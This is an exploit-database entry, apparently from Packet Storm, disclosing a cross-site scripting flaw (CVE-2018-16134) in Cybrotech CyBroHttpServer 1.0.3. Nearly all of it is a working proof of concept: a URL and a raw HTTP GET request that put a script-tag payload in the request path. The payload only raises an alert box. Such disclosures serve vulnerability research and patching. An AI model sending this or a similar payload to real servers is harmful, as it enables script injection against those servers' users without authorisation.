Cybrotech CyBroHttpServer version 1.0.3 suffers from a cross site scripting vulnerability.
149e18fdc58e7ab10a560a31539fb56b08816845e01114abfa7a0b7a31ad5ba8# Exploit Title: Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting
# Date: 2018-08-29
# Exploit Author: Emre AVANA
# Vendor Homepage: https://www.cybrotech.com/
# Software Link: https://www.cybrotech.com/wp-content/uploads/2016/11/CyBroHttpServer-v1.0.3.zip
# Version: v1.0.3
# Tested on: Windows
# CVE-2018-16134
# PoC
https://<host>/<script>alert('xss');</script>
GET <script>alert('xss');</script> HTTP/1.1
Host: 192.168.43.102:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:61.0) Gecko/20100101
Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed